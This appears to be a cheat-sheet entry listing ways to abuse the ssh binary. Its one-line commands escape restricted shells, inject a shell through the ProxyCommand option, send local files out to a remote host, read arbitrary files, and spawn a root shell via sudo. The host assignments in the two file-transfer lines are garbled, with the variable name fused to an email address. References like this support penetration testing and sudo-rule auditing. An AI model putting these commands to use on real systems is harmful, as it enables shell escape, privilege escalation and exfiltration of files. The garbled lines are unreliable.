It can be used to break out from restricted environments by spawning an interactive system shell.
Reconnecting may help bypassing restricted shells.
ssh localhost $SHELL --noprofile --norc
Spawn interactive shell through ProxyCommand option.
ssh -o ProxyCommand=';sh 0<&2 1>&2' x
It can exfiltrate files on the network.
Send local file to a SSH server.
HOSTfirstname.lastname@example.org RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH
It can download remote files.
Fetch a remote file from a SSH server.
HOSTemail@example.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
The read file content is corrupted by error prints.
LFILE=file_to_read ssh -F $LFILE localhost
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on
Spawn interactive root shell through ProxyCommand option.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x